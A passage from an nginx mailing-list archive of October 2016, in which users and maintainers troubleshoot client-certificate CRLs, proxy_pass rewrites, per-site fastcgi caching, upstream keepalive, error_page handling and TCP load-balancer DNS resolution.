depth to the number or greater than the > number of ca's and I had to get all the crl's for each CA and concat > into a crl file. > > > > On 14 October 2016 at 16:49, Zeal Vora wrote: > > Thanks Maxim. > > > > I tried changing the ssl_verify_depth to 1 from value of 2 however still > I > > get 400 Bad Request for all the certificates ( Valid and Revoked ). > > > > I checked the error_log file, there are no entries in that file. It all > > works when I remove the ssl_crl option ( however then revoked > certificates > > are allowed ). > > > > Just for bit more info, I downloaded the CRL from ADCS which is in form > of > > test.crl which I convert it to .pem format with openssl. > > > > > > > > > > On Thu, Oct 13, 2016 at 6:27 PM, Maxim Dounin > wrote: > >> > >> Hello! > >> > >> On Thu, Oct 13, 2016 at 03:07:25PM +0530, Zeal Vora wrote: > >> > >> > Hi > >> > > >> > We've implemented basic Certificate Based Authentication for Nginx. > >> > > >> > However whenever the certificate is revoked, Nginx still allows the > >> > client > >> > ( with revoked certificate ) to access the website. > >> > > >> > I verified manually with openssl with OCSP URI and OCSP seems to be > >> > working > >> > properly. Nginx doesn't seem to be forwarding request to OCSP before > >> > allowing client. > >> > >> That's because nginx doesn't support OCSP validation of client > >> certificates. Use CRLs instead. > >> > >> > I tried to specify the ssl_crl but as soon as I put it, all the > clients > >> > starts to receive 400 Bad Request. > >> > > >> > Here is my sample relevant Nginx Config :- > >> > > >> > > >> > ### SSL cert files ### > >> > > >> > ssl_client_certificate /test/ca.crt; > >> > ssl_verify_client optional; > >> > > >> > ssl_crl /prod-adcs/latest.pem; > >> > ssl_verify_depth 2; > >> > > >> > > >> > Is there something that I'm missing here ? > >> > >> Your error log should have details. Given you are using verify > >> depth set to 2, most likely there is no CRL for the root > >> certificate itself, and that's why nginx complaining. > >> > >> -- > >> Maxim Dounin > >> http://nginx.org/ > >> > >> _______________________________________________ > >> nginx mailing list > >> nginx at nginx.org > >> http://mailman.nginx.org/mailman/listinfo/nginx > > > > > > > > _______________________________________________ > > nginx mailing list > > nginx at nginx.org > > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at forum.nginx.org Fri Oct 14 10:53:48 2016 From: nginx-forum at forum.nginx.org (avk) Date: Fri, 14 Oct 2016 06:53:48 -0400 Subject: proxy_pass for subfolders Message-ID: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org> Hi! Can you help? How use proxy_pass (or other methods) for proxy subfolder-requests? Example: site1.ltd/folder1 -> proxy to site2.ltd/app Thx! Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270269#msg-270269 From black.fledermaus at arcor.de Fri Oct 14 11:51:09 2016 From: black.fledermaus at arcor.de (basti) Date: Fri, 14 Oct 2016 13:51:09 +0200 Subject: proxy_pass for subfolders In-Reply-To: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org> References: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de> Hello, try somethink like location /folder1/ { rewrite /folder1/(.*)$ /app/$1 break; proxy_pass http://site2.ltd; proxy_redirect off; // this is only for loging on site2 to see the ip of the user and not the ip of proxy server proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_max_temp_file_size 0; } Best Regards, Basti p.s i use this to proxy an wordpress site On 14.10.2016 12:53, avk wrote: > Hi! Can you help? How use proxy_pass (or other methods) for proxy > subfolder-requests? Example: site1.ltd/folder1 -> proxy to site2.ltd/app > Thx! > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270269#msg-270269 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > From nginx-forum at forum.nginx.org Fri Oct 14 14:28:41 2016 From: nginx-forum at forum.nginx.org (avk) Date: Fri, 14 Oct 2016 10:28:41 -0400 Subject: proxy_pass for subfolders In-Reply-To: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de> References: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de> Message-ID: <4e29340607eab0e846575690eedf889d.NginxMailingListEnglish@forum.nginx.org> Thank you for reply, but not working. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270278#msg-270278 From francis at daoine.org Fri Oct 14 14:56:55 2016 From: francis at daoine.org (Francis Daly) Date: Fri, 14 Oct 2016 15:56:55 +0100 Subject: proxy_pass for subfolders In-Reply-To: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org> References: <9c0e293efa320479a324457023ea590d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20161014145655.GG11677@daoine.org> On Fri, Oct 14, 2016 at 06:53:48AM -0400, avk wrote: Hi there, > Hi! Can you help? How use proxy_pass (or other methods) for proxy > subfolder-requests? Example: site1.ltd/folder1 -> proxy to site2.ltd/app http://nginx.org/r/proxy_pass Possibly the first bullet point after "A request URI is passed to the server as follows:" is relevant? Cheers, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Oct 14 16:11:47 2016 From: nginx-forum at forum.nginx.org (mrast) Date: Fri, 14 Oct 2016 12:11:47 -0400 Subject: Fastcgi_cache only caching 1 website Message-ID: <2ca03652d7d5fa430e1dd04c981255a5.NginxMailingListEnglish@forum.nginx.org> Hi, Im relativly new to the Linux world but am learning bloody quick (you have too, its unforgiving! :) ) I am setting up a new web server and im nearly ready to go live but cant iron out 1 last issue - and thats i have multiple wordpress websites setup. Each wordpress website has its own install and installation directory and seperate database. I have configured nginx with the fastcgi_cache module and it works - but only for the very first website i setup on the server. Every subsequent website gets nothing cached. Running nginx/php7 on Ubuntu Server 16.04 Here is my nginx/nginx.conf file user www-data; worker_processes 1; worker_rlimit_nofile 100000; pid /run/nginx.pid; events { worker_connections 1024; multi_accept on; } http { sendfile on; tcp_nopush on; tcp_nodelay on; keepalive_timeout 15; types_hash_max_size 2048; server_tokens off; reset_timedout_connection on; # add_header X-Powered-By "EasyEngine"; add_header rt-Fastcgi-Cache $upstream_cache_status; # Limit Request limit_req_status 403; limit_req_zone $binary_remote_addr zone=one:10m rate=1r/s; # Proxy Settings # set_real_ip_from proxy-server-ip; # real_ip_header X-Forwarded-For; fastcgi_read_timeout 300; client_max_body_size 100m; ## # SSL Settings ## ssl_session_cache shared:SSL:20m; ssl_session_timeout 10m; ssl_prefer_server_ciphers on; ssl_ciphers ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:ECDHE-RSA-DES-CBC3-SHA:ECDHE-ECDSA-DES-CBC3-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; ## # Basic Settings ## # server_names_hash_bucket_size 64; # server_name_in_redirect off; include /etc/nginx/mime.types; default_type application/octet-stream; ## # Logging Settings ## access_log /var/log/nginx/access.log; error_log /var/log/nginx/error.log; # Log format Settings log_format rt_cache '$remote_addr $upstream_response_time $upstream_cache_status [$time_local] ' '$http_host "$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent"'; ## # Gzip Settings ## gzip on; gzip_disable "msie6"; gzip_vary on; gzip_proxied any; gzip_comp_level 2; gzip_buffers 16 8k; gzip_http_version 1.1; gzip_types application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/svg+xml image/x-icon text/css text/plain text/x-component text/xml text/javascript; ## # Cache Settings ## add_header Fastcgi-Cache $upstream_cache_status; fastcgi_cache_key "$scheme$request_method$host$request_uri"; fastcgi_cache_use_stale error timeout invalid_header http_500; fastcgi_ignore_headers Cache-Control Expires Set-Cookie; ## # Virtual Host Configs ## include /etc/nginx/conf.d/*.conf; include /etc/nginx/sites-enabled/*; server { listen 80 default_server; server_name _; return 444; } } Here is the cache working websites config fastcgi_cache_path /var/www/html/1stwebsite.com/cache levels=1:2 keys_zone=1stwebsite.com:100m inactive=60m; server { server_name 1stwebsite.com www.1stwebsite.com; access_log /var/www/html/1stwebsite.com/logs/access.log; error_log /var/www/html/1stwebsite.com/logs/error.log; root /var/www/html/1stwebsite.com/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* "PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache 1stwebsite.com; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge 1stwebsite.com "$scheme$request_method$host$1"; } } Here is 1 of the non working cache websites config fastcgi_cache_path /var/www/html/2ndwebiste.co.uk/cache levels=1:2 keys_zone=2ndwebiste.co.uk:100m inactive=60m; server { server_name 2ndwebiste.co.uk www.2ndwebiste.co.uk; access_log /var/www/html/2ndwebiste.co.uk/logs/access.log; error_log /var/www/html/2ndwebiste.co.uk/logs/error.log; root /var/www/html/2ndwebiste.co.uk/public/; index index.php index.html index.htm; set $skip_cache 0; if ($request_method = POST) { set $skip_cache 1; } if ($query_string != "") { set $skip_cache 1; } if ($request_uri ~* "/wp-admin/|/phpmyadmin|/xmlrpc.php|wp-.*.php|/feed/|index.php|sitemap(_index)?.xml") { set $skip_cache 1; } if ($http_cookie ~* "comment_author|wordpress_[a-f0-9]+|wp-postpass|wordpress_no_cache|wordpress_logged_in") { set $skip_cache 1; } if ($http_cookie ~* "PHPSESSID"){ set $skip_cache 1; } location / { try_files $uri $uri/ /index.php?$args; } location /phpmyadmin { auth_basic "Admin Login"; auth_basic_user_file /etc/nginx/allow_phpmyadmin; } location ~ \.php$ { try_files $uri =404; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass unix:/var/run/php/php7.0-fpm.sock; fastcgi_index index.php; include fastcgi_params; fastcgi_cache_bypass $skip_cache; fastcgi_no_cache $skip_cache; fastcgi_cache 2ndwebiste.co.uk; fastcgi_cache_valid 60m; } location ~ /purge(/.*) { fastcgi_cache_purge 2ndwebiste.co.uk "$scheme$request_method$host$1"; } } I think its to do with the very top line of both config files? fastcgi_cache_path /var/www/html/2ndwebiste.co.uk/cache levels=1:2 keys_zone=2ndwebiste.co.uk:100m inactive=60m; Does this need to be in the main nginx.conf file and not in each individual website config? If so - am i not meant to have a cache folder for each individual website, should there just be 1 central cache folder for all websites? I thought the "keys_zone" directive needs to be individual for each website, and thus created a seperate cache location for each website hosted. Thanks to anybody that can walk with me over the finishing line Regards Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270284,270284#msg-270284 From black.fledermaus at arcor.de Fri Oct 14 17:31:24 2016 From: black.fledermaus at arcor.de (basti) Date: Fri, 14 Oct 2016 19:31:24 +0200 Subject: proxy_pass for subfolders In-Reply-To: <4e29340607eab0e846575690eedf889d.NginxMailingListEnglish@forum.nginx.org> References: <8188442d-390f-4605-5137-8430b22f8c78@arcor.de> <4e29340607eab0e846575690eedf889d.NginxMailingListEnglish@forum.nginx.org> Message-ID: <518ea390-ef5f-3995-a0b3-55120d702b2b@arcor.de> Sorry, not working is not an error message, so nobody can help you. Perhaps you *should* edit this example? What have you try? What is the error? What's in the access-/errorlog (srv1 and srv2)? On 14.10.2016 16:28, avk wrote: > Thank you for reply, but not working. > > Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270278#msg-270278 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx From francis at daoine.org Sat Oct 15 08:22:04 2016 From: francis at daoine.org (Francis Daly) Date: Sat, 15 Oct 2016 09:22:04 +0100 Subject: Multiple proxy_cache_path location In-Reply-To: References: Message-ID: <20161015082204.GH11677@daoine.org> On Thu, Oct 13, 2016 at 05:40:21AM -0400, lancee83 wrote: Hi there, > I'm using nginx with Unified Streaming - I would like to have different > cache settings per channel. Is it possible to state different > proxy_cache_path parameters? I think that you can have multiple proxy_cache_path directives with different parameters, each with their own path and zone. And then you can use a proxy_cache with a different zone, in different locations. So for different parameters per channel, you want different location{}s per channel. f -- Francis Daly francis at daoine.org From JEDC at ramboll.com Sat Oct 15 12:18:11 2016 From: JEDC at ramboll.com (Jens Dueholm Christensen) Date: Sat, 15 Oct 2016 12:18:11 +0000 Subject: Static or dynamic content In-Reply-To: <20160930105450.GG11677@daoine.org> References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> Message-ID: On Friday, September 30, 2016 12:55 AM Francis Daly wrote, >> No, I have an "error_page 503" and a similar one for 404 that points to two named locations, but that's it. > That might matter. > I can now get a 503, 404, or 405 result from nginx, when upstream sends a 503. [...] > Now make /tmp/x exist, and /tmp/y not exist. > > A GET request for /x is proxied, gets a 503, and returns the content of /tmp/x with a 503 status. > > A GET request for /y is proxied, gets a 503, and returns a 404 status. > > A POST request for /x is proxied, gets a 503, and returns a 405 status. > > A POST request for /y is proxied, gets a 503, and returns a 404 status. > > Since you also have an error_page for 404, perhaps that does something that leads to the output that you see. > > I suspect that when you show your error_page config and the relevant > locations, it may become clearer what you want to end up with. My local test config looks like this (log specifications and other stuff left out): server { listen 80; server_name localhost; location / { root html; try_files /offline.html @xact; add_header Cache-Control "no-cache, max-age=0, no-store, must-revalidate"; } location @xact { proxy_pass http://127.0.0.1:4431; proxy_redirect default; proxy_read_timeout 2s; proxy_send_timeout 2s; proxy_connect_timeout 2s; proxy_intercept_errors on; } error_page 404 @error_404; error_page 503 @error_503; location @error_404 { root error; rewrite (logo.png)$ /$1 break; rewrite ^(.*)$ /error404.html break; } location @error_503 { root error; rewrite (logo.png)$ /$1 break; rewrite ^(.*)$ /error503.html break; } > A test system which talks to a local HAProxy which has no "up" backends > would probably be quicker to build. Yes, thats what I had listening on 127.0.0.1:4431, and it did give me the same behaviour as I'm seeing in our production environment. I got the following captures via pcap and wireshark: Conditions are: HAProxy has a backend with no available servers, so every request results in a 503 to upstream client (nginx). A POST request to some resource from a browser: POST /2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Cookie: new-feature=1; Language_In_Use= Connection: keep-alive This makes nginx send this request to HAProxy: POST /2 HTTP/1.0 Host: 127.0.0.1:4431 Connection: close Content-Length: 0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en Accept-Encoding: gzip, deflate DNT: 1 Content-Type: application/x-www-form-urlencoded Cookie: new-feature=1; Language_In_Use= HAProxy returns this: HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html

503 Service Unavailable

No server is available to handle this request. HAProxy also logs this (raw syslog packet): <134>Oct 15 13:17:33 jedc-local haproxy[10104]: 127.0.0.1:64746 [15/Oct/2016:13:17:33.800] xact_in-DK xact_admin/ 0/-1/-1/-1/0 503 212 - - SC-- 0/0/0/0/0 0/0 "POST /2 HTTP/1.0" This makes nginx return this back to the browser: HTTP/1.1 405 Not Allowed Server: nginx/1.8.0 Date: Sat, 15 Oct 2016 11:17:33 GMT Content-Type: text/html Content-Length: 172 Connection: keep-alive nginx also logs this: localhost 127.0.0.1 "-" [15/Oct/2016:13:17:33 +0200] "POST /2 HTTP/1.1" 405 172 503 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" http "-" "-" "-" "-" -/- There is no mention of the error_page 503 location or any of the resources they specify (logo.png or error503.html) in any of nginx' logs, so I assume that they are not really connected to the problems I see. Any ideas? Regards, Jens Dueholm Christensen -------------- next part -------------- An HTML attachment was scrubbed... URL: From emailgrant at gmail.com Sat Oct 15 12:20:42 2016 From: emailgrant at gmail.com (Grant) Date: Sat, 15 Oct 2016 05:20:42 -0700 Subject: keepalive upstream In-Reply-To: References: Message-ID: > I've been struggling with a very difficult to diagnose problem when > using apache2 and Odoo in a reverse proxy configuration with nginx. > Enabling keepalive for upstream in nginx seems to have fixed it. Why > is it not enabled upstream by default as it is downstream? Does anyone know why this isn't a default? - Grant From me at myconan.net Sun Oct 16 08:01:36 2016 From: me at myconan.net (Edho Arief) Date: Sun, 16 Oct 2016 17:01:36 +0900 Subject: Index fallback? In-Reply-To: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> References: <1476071817.2441612.750777601.36BE7773@webmail.messagingengine.com> Message-ID: <1476604896.1747068.757323793.19F5A248@webmail.messagingengine.com> Hi, Just updating myself, I realized I don't even need any weird setup, just change the fallback location from location @something { } into location = /.something { } and set index parameter to index index.html /.something; It works because the last element of the list can be an absolute path as mentioned in documentation. On Mon, Oct 10, 2016, at 12:56, Edho Arief wrote: > I somehow can't make this scenario work: > > root structure: > /a/index.html > /b/ <-- no index.html > > accessing: > 1. site.com/a -> redirect to site.com/a/ -> show /a/index.html > 2. site.com/b -> redirect to site.com/b/ -> show @fallback > > > Using > > try_files $uri $uri/index.html @fallback; > > doesn't work quite well because #1 becomes this instead: > > 1. site.com/a -> show /a/index.html > > and breaks relative path javascript/css files (because it's `/a` in > browser, not `/a/`). > > And using > > try_files $uri @fallback; > > Just always show @fallback for both scenarios. > > Whereas > > try_files $uri $uri/ @fallback; > > Always return 403 for #2 because the directory exists and there's no > index. > > As a side note, > > error_page 404 = @fallback; > > Wouldn't work because as mentioned in the previous one, it returns 403 > for #2 (directory exists, no index), not 404. > > Is there any way to do it without specifying separate location for each > of them? From francis at daoine.org Sun Oct 16 08:33:43 2016 From: francis at daoine.org (Francis Daly) Date: Sun, 16 Oct 2016 09:33:43 +0100 Subject: keepalive upstream In-Reply-To: References: Message-ID: <20161016083343.GI11677@daoine.org> On Sat, Oct 15, 2016 at 05:20:42AM -0700, Grant wrote: Hi there, > > I've been struggling with a very difficult to diagnose problem when > > using apache2 and Odoo in a reverse proxy configuration with nginx. > > Enabling keepalive for upstream in nginx seems to have fixed it. Why > > is it not enabled upstream by default as it is downstream? > > Does anyone know why this isn't a default? My guess? Historical reasons and consistency. proxy_pass from nginx to upstream was HTTP/1.0, which default assumes "Connection: close" unless the client explicitly says otherwise. And (without checking) I guess that nginx was explicit about "close". Then the option of proxy_http_version came about, which would allow you take advantage of some extra features if you know that your upstream uses them. Arguably, "proxy_http_version 1.1" should imply "Connection: keep-alive" if not explicitly overridden, but (again, my guess) it was cleaner and simpler to make the minimum changes when adding support for the new client http version, and the upstream server must be able to handle "Connection: close". If you want close, keep-alive, upgrade, or something else, you can add it yourself. nginx has to pick one to use if none is specified, and it looks like it picked the one that was already its default. Principle of Least Surprise, for current users. On the "downstream" side, nginx is a http/1.1 (or 2) server. If the client connects using http/1.0, nginx will respond with "Connection: close" unless the client said otherwise. If the client connects using http/1.1, nginx will respond with "Connection: keep-alive" unless the client said otherwise. That's the http server-side rules. Also, I guess that nginx generally assumes that the things that it talks to are correct. I'm not sure, but it sounds like you are reporting that some combination of things that is your upstream was receiving whatever http request nginx was making, and was responding in a way that nginx was not expecting. If some part of that sequence was breaking the http request/response rules, it would be good to know so that it could be fixed in the right place. Naively, it sounds like your upstream was taking the nginx "Connection: close" part of the request and ignoring it. If that is the case, your upstream is wrong and should be fixed, independent of whatever nginx does. f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Mon Oct 17 13:50:15 2016 From: nginx-forum at forum.nginx.org (CarstenK.) Date: Mon, 17 Oct 2016 09:50:15 -0400 Subject: Problem with cache key Message-ID: <243ee282884a2112a03b2d278a3f396f.NginxMailingListEnglish@forum.nginx.org> Hello, i have a problem. If i send a request to url A with Chrom and another request with curl or firefox i have a cache miss. If isend a request to the same url with curl on two different machines the answer is a cache hit, thats fine. But i don't know, why ich became a cache miss if i test with Chrome/Firefox, Chrome/curl or Firefox/curl on the second request. curl -I http://meinedomain/test.html I think it is a problem with cache_key but i can't find the reason. First step i only consider the url with arguments, no cookie or something else. In a further step i want to consider a special cookie. Version: nginx version: nginx/1.11.3 (nginx-plus-r10) (30 days trial) Hier meine Konfiguration ### proxy.conf proxy_cache_path /srv/nginx/cache/test levels=1:2 keys_zone=test_cache:128m inactive=120d max_size=25G; map $request_method $purge_method { PURGE 1; default 0; } server { listen 80; server_name ; access_log /var/log/nginx/fliesenrabatte.access.log shop; error_log /var/log/nginx/fliesenrabatte.error.log; proxy_cache fliesenrabatte_cache; rewrite_log on; proxy_set_header Host ; proxy_cache_key $request_uri; # Caching deaktivieren # NoCache URLs if ($request_uri ~* "(/admin.*|/brand.*|/user.*|/login.*)") { set $no_cache 1; } proxy_no_cache $no_cache; # Startseite location ~ /$ { proxy_ignore_headers "Set-Cookie"; proxy_hide_header "Set-Cookie"; proxy_pass http://meinupstream; proxy_cache_purge $purge_method; } # Cachen location ~* \.(html|gif|jpg|png|js|css|pdf|woff|woff2|otf|ttf|eot|svg)$ { proxy_ignore_headers "Set-Cookie"; proxy_hide_header "Set-Cookie"; proxy_pass http://meinupstream; proxy_cache_purge $purge_method; } # nicht cachen (Warenkorb usw) location ~* \.(cfc|cfm|htm)$ { proxy_cache off; proxy_pass http://meinupstream; } # Fuer Wildcard purging notwendig, da String auf Wildcard endet location / { allow 1.1.1.1; deny all; proxy_ignore_headers "Set-Cookie"; proxy_hide_header "Set-Cookie"; proxy_pass http://meinupstream; proxy_cache_purge $purge_method; } } ### site-conf server_tokens off; proxy_ignore_headers X-Accel-Expires Expires Cache-Control; proxy_cache_valid 200 120d; proxy_set_header Host $http_host; proxy_set_header X-Real-IP $remote_addr; add_header X-Cache-Status $upstream_cache_status; upstream meinupstream { server meinedomain.de:80; } I hope someone can help me. Sorry for my bad english :( Best, Carsten Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270324,270324#msg-270324 From nginx-forum at forum.nginx.org Mon Oct 17 14:24:45 2016 From: nginx-forum at forum.nginx.org (avk) Date: Mon, 17 Oct 2016 10:24:45 -0400 Subject: proxy_pass for subfolders In-Reply-To: <518ea390-ef5f-3995-a0b3-55120d702b2b@arcor.de> References: <518ea390-ef5f-3995-a0b3-55120d702b2b@arcor.de> Message-ID: >From proxy server : 2016/10/17 14:19:38 [error] 6735#6735: *236 open() "/var/lib/nginx/html/000001" failed (2: No such file or directory), client:ip, server: localhost, request: "GET /000001 HTTP/1.1" >From srv1 & srv2: - [17/Oct/2016:14:16:47 +0000] "GET /123456 HTTP/1.1" 301 185 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0" nginx (proxy) conf: location /123456/ { rewrite /123456/(.*)$ /$1 break; proxy_pass http://SRV1/; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_max_temp_file_size 0; Posted at Nginx Forum: https://forum.nginx.org/read.php?2,270269,270330#msg-270330 From matthewceroni at gmail.com Mon Oct 17 21:44:00 2016 From: matthewceroni at gmail.com (Matthew Ceroni) Date: Mon, 17 Oct 2016 14:44:00 -0700 Subject: NGINX Open Source TCP Load Balancing - service discovery Message-ID: https://www.nginx.com/blog/dns-service-discovery-nginx-plus/ Testing out the options provided in the above link. Specifically the "Setting the Domain Name in a Variable". The example given is L7 load balancing. I have a need for L4 using upstream, yet I am not able to get this method to work (if it even does). The Note seems to indicate that it does by stating that this method is available in 1.11.3 of the Open source version. The issue is around where to set the variable. I have tried setting it in the upstream block but that errors saying set is not valid in this context. Tried setting it in the stream context, same error. I have also tried this on both Plus and open source and get the same errors on both. Any insight would be helpful. Thanks config: # TCP/UDP proxy and load balancing block # stream { proxy_protocol on; resolver 10.6.0.10 valid=10s; # Example configuration for TCP load balancing upstream stream_backend { zone tcp_servers 64k; server backend_servers:25 max_fails=3; } server { listen 25; status_zone tcp_server; proxy_pass stream_backend; } } So basically I need to replace server backend_servers with server $backend_servers but need to set that variable somewhere. -------------- next part -------------- An HTML attachment was scrubbed... URL: From zhanght1 at lenovo.com Tue Oct 18 02:50:57 2016 From: zhanght1 at lenovo.com (Felix HT1 Zhang) Date: Tue, 18 Oct 2016 02:50:57 +0000 Subject: Error when download the big file of 2MB Message-ID: <3B8195E42ECF3D4DA1072EF35B4F39F80138255BCA@CNMAILEX01.lenovo.com> Dears, We could download the 20MB file from web in internal APP,but it is failed when used nginx. Here is the error info:the server responsed with a status of 504(Gateway Time-out). How could I fix this problem? BR Felix zhang -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Tue Oct 18 06:28:27 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 18 Oct 2016 07:28:27 +0100 Subject: Static or dynamic content In-Reply-To: References: <20160929220228.GF11677@daoine.org> <20160930105450.GG11677@daoine.org> Message-ID: <20161018062827.GJ11677@daoine.org> On Sat, Oct 15, 2016 at 12:18:11PM +0000, Jens Dueholm Christensen wrote: > On Friday, September 30, 2016 12:55 AM Francis Daly wrote, Hi there, > > I suspect that when you show your error_page config and the relevant > > locations, it may become clearer what you want to end up with. > > My local test config looks like this (log specifications and other stuff left out): > location / { > root html; > try_files /offline.html @xact; > } > location @xact { > proxy_pass http://127.0.0.1:4431; > proxy_intercept_errors on; > } > error_page 503 @error_503; > location @error_503 { > root error; > rewrite (logo.png)$ /$1 break; > rewrite ^(.*)$ /error503.html break; > } So: a POST for /x will be handled in @xact, which will return 503, which will be handled in @error_503, which will be rewritten to a POST for /error503.html which will be sent to the file error/error503.html, which will return a 405. Is that what you see? Two sets of questions remain: what output do you get when you use the test config in the earlier mail? what output do you want? That last one is probably "http 503 with the content of *this* file"; and is probably completely obvious to you; but I don't think it has been explicitly stated here, and it is better to know than to try guessing. > HAProxy returns this: > > HTTP/1.0 503 Service Unavailable > Cache-Control: no-cache > Connection: close > Content-Type: text/html > >

503 Service Unavailable

> No server is available to handle this request. > Ok, that's a normal 503. > HAProxy also logs this (raw syslog packet): > > <134>Oct 15 13:17:33 jedc-local haproxy[10104]: 127.0.0.1:64746 [15/Oct/2016:13:17:33.800] xact_in-DK xact_admin/ 0/-1/-1/-1/0 503 212 - - SC-- 0/0/0/0/0 0/0 "POST /2 HTTP/1.0" > > This makes nginx return this back to the browser: > > HTTP/1.1 405 Not Allowed > Server: nginx/1.8.0 > Date: Sat, 15 Oct 2016 11:17:33 GMT > Content-Type: text/html > Content-Length: 172 > Connection: keep-alive And that's the 405 because your config sends the 503 to a static file. > nginx also logs this: > > localhost 127.0.0.1 "-" [15/Oct/2016:13:17:33 +0200] "POST /2 HTTP/1.1" 405 172 503 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0" http "-" "-" "-" "-" -/- > There is no mention of the error_page 503 location or any of the resources they specify (logo.png or error503.html) in any of nginx' logs, so I assume that they are not really connected to the problems I see. > Unless you are looking at the nginx debug log, you are not seeing anything about nginx's internal subrequests. If you remove the error_page 503 part or the proxy_intercept_errors part, does the expected http status code get to your client? > Any ideas? I think that the nginx handling of subrequests from a POST for error handling is a bit awkward here. But until someone who cares comes up with an elegant and consistent alternative, I expect that it will remain as-is. Possibly in your case you could convert the POST to a GET by using proxy_method and proxy_pass within your error_page location. That also feels inelegant, but may give the output that you want. Cheers, f -- Francis Daly francis at daoine.org From francis at daoine.org Tue Oct 18 07:14:38 2016 From: francis at daoine.org (Francis Daly) Date: Tue, 18 Oct 2016 08:14:38 +0100 Subject: NGINX Open Source TCP Load Balancing - service discovery In-Reply-To: References: Message-ID: <20161018071438.GK11677@daoine.org> On Mon, Oct 17, 2016 at 02:44:00PM -0700, Matthew Ceroni wrote: Hi there, Untested, but... > https://www.nginx.com/blog/dns-service-discovery-nginx-plus/ > The issue is around where to set the variable. I have tried setting it in > the upstream block but that errors saying set is not valid in this context. > Tried setting it in the stream context, same 